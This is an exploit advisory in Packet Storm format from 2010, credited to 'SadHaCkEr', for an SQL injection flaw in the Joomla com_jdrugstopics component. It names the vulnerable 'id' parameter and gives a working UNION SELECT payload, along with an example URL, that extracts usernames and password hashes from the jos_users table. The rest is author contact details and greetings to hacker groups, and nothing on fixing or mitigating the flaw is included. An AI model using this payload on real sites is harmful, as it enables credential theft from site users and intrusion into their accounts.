Joomla JDrugsTopics SQL Injection

2010-04-13T00:00:00
ID PACKETSTORM:88293
Type packetstorm
Reporter SadHaCkEr
Modified 2010-04-13T00:00:00

Description

                                        
                                            `# Title: Joomla Component com_jdrugstopics SQL Injection Vulnerability   
# Author: SadHaCkEr  
# Data : 2010-04-12  
  
[~]######################################### InformatioN #############################################[~]  
  
#AUTHOR: SadHaCkEr   
#Email: n5s@hotmail.[choose ANY ONE] IF U lucky U will Find Me   
#Website: http://www.sadx.297m.com/   
#Forum : http://v4-team.net/cc   
  
[~]######################################### ExploiT #############################################[~]  
  
[~] Vulnerable :  
  
http://127.0.0.1/index.php?option=com_jdrugstopics&view=drugsdetails&id=[SQL]  
  
[~] ExploiT :  
  
-226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--  
  
[~] Example :  
  
http://127.0.0.1/index.php?option=com_jdrugstopics&view=drugsdetails&id=  
-226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--  
  
  
  
[~]######################################### ThankS To ... ############################################[~]  
  
[~] Special Thanks 2 :  
  
RoMaNcYxHaCkEr, Mr.Safa7, Mn7oS & Sniper Code & Red Virus & HCJ & Mr.Wolf & ayaster & All Trayg Member .  
  
[~] Trayg Team + V4-Team + SVT Team   
  
[~] GreetZ 2: My LoV3r + My Keyboard  
  
[~]######################################### ./Done #############################################[~]  
`